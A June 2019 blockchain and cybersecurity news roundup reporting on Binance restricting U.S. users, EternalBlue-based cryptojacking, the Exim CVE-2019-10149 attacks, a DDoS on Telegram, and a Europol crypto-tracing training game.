Last Week In Blockchain and CyberSecurity News - June 18, 2019

Binance to Close U.S. Trading in 86 Days 

Binance, the largest cryptocurrency exchange by volume, has announced that after September 12, 2019, U.S. users will no longer be able to trade on the platform. According to he exchange’s updated terms of service, the company “is unable to provide services to any U.S. person,” and “users who are not in accordance with Binance’s Terms of Use will continue to have access to their wallets and funds, but will no longer be able to trade or deposit on Binance.com.” 

Roughly 15 percent of Binance’s traffic comes from U.S. customers. The exchange also announced that its new Binance.US platform is undergoing development and will most likely be the only Binance platform available for U.S. crypto enthusiasts.  

As with many U.S. cryptocurrency exchanges, the upcoming U.S. platform will most likely require strict identification checks to better comply with local laws and regulations. Binance also asserts that the new platform will have a relatively similar feel as the original exchange. 

Read more here

Hackers Infect Businesses with CryptoMiners Using NSA Leaked Tools

Researchers have discovered an ongoing cryptojacking campaign utilizing the NSA-developed EternalBlue and EternalChampion SMB exploits along with XMRig Monero miners. While Microsoft has already released patches for the security flaws related to Eternal Blue and EternalChampion, many devices remain unpatched. Cybercriminals have taken advantage of vulnerable machines and have targeted devices around the world.  

Trend Micro researchers state that "businesses across a wide range of industries, including education, communication and media, banking, manufacturing, and technology" are being targeted in these attacks, with the bad actors focusing on victims who use "obsolete or unpatched software."  

By using a “shotgun” method of attack, cybercriminals attempt to compromise any vulnerable machine they can find. EternalBlue and EternalChampion are dangerous weaknesses, and as with all vulnerabilities, it is critical to keep your device up to date with the latest patches. 

Read more here

Millions of Exim Mail Servers Are Currently Under Attack

A critical vulnerability affecting versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software allows “remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.” Cybercriminals have been gaining permanent root access to many vulnerable machines via SSH, according to security researchers. The vulnerability, CVE-2019-10149, is dubbed as "The Return of the WIZard" by Qualys.  

A Shodan search conducted by BleepingComputer earlier this month showed that “vulnerable versions of Exim were running on more than 4,800,000 machines, with roughly 588,000 servers having already installed the patched Exim 4.92 release.” A more recent scan shows that “over 3,680,000 servers are running a vulnerable version of Exim, while the number of patched machines has increased to 1,765,293.”  

Threat actors are exploiting all vulnerable mail servers using a Bash script in a hidden service “(an7kmd2wp4xo7hpr) via tor2web 'routing' services after exploiting the Exim flaw.” The CVE resides in the deliver_message() function in /src/deliver.c caused by an invalid validation of the recipient address. It is encouraged to patch Exim mail servers to version 4.92+.  

Get more information here

Telegram CEO Fingers China State Actors for DDoS Attack 

Telegram experienced a “powerful” distributed denial of service (DDoS) attack on Wednesday, rendering connection issues for its users. Telegram Founder and CEO Pavel Durov later tweeted that much of the traffic which hit its company's servers originated from Chinese IP addresses. Durov went into further detail, stating that the “DDoS attack coincided in time with protests in Hong Kong.” 

Security firms detected numerous attacks against Telegram “sourced from more than 100 countries” during the time frame in question. However, during attacks like the one Telegram experienced, “it is common practice for attackers to use spoofed source IP address to conceal their own infrastructure.”   

The first attack against Telegram lasted over 16 hours and consisted of over 350 Gbps and 150 million packets per second. The second attack lasted around six hours with a bandwidth of more than 120 Gbps. At the time of writing, Telegram seems to have stabilized their service. 

Read more here

Europol Developing ‘Game’ to Teach Officers How to Trace Cryptocurrency

European law enforcement will soon be training officers on how to trace and investigate illicit uses of digital currencies through a game specifically created for the task. The game has been developed in collaboration with CENTRIC (Centre of Excellence in Terrorism, Resilience, Intelligence and Organized Crime Research) and is labeled the “cryptocurrency-tracing serious game.”  

It aims to provide law enforcement officers hands-on training for tracing cryptocurrencies and provides best practices when undertaking cryptocurrency-related investigations. The game is set to launch in October and will be revealed at the seventh Europol-INTERPOL Cybercrime conference. 

Read more here